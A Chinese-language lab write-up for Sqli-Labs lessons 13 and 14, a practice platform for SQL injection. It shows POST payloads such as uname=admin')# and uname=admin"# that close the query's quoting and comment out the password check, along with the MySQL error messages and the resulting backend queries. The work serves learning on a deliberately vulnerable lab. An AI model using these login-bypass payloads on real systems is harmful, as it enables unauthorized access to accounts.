Sqli-Labs是用来练习sql注入的好平台。project地址：https://github.com/Audi-1/sqli-labs
本文测试环境：使用phpstudy集成环境。mysql版本：5.5.53

Less-13 POST- Double Injection -Single quotes -String-with twist
Less-14 POST- Double Injection -Single quotes -String-with twist

Less 13

当post数据为：

1	uname=admin'&passwd=chybeta&submit=Submit

报错语句：

1	You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'chybeta') LIMIT 0,1' at line 1

说明有括号保护，需闭合。

当post数据为：

1	uname=admin')#&passwd=chybeta&submit=Submit

页面返回提示说已经登陆成功。

后台查询语句为:

1	SELECT username, password FROM users WHERE username=('admin')#`') and password=('chybeta') LIMIT 0,1

Less 14

当post数据为：

1	uname=admin"&passwd=chybeta&submit=Submit

报错语句为：

1	You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'chybeta" LIMIT 0,1' at line 1

当post数据为：

1	uname=admin&passwd=chybeta"&submit=Submit

报错语句为:

1	You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"chybeta"" LIMIT 0,1' at line 1

从以上几条语句知道，需要闭合双引号。

payload：

1	uname=admin"#&passwd=chybeta&submit=Submit

页面返回提示说已经登陆成功。

后台查询语句为：

1	SELECT username, password FROM users WHERE username="admin"#" and password="chybeta" LIMIT 0,1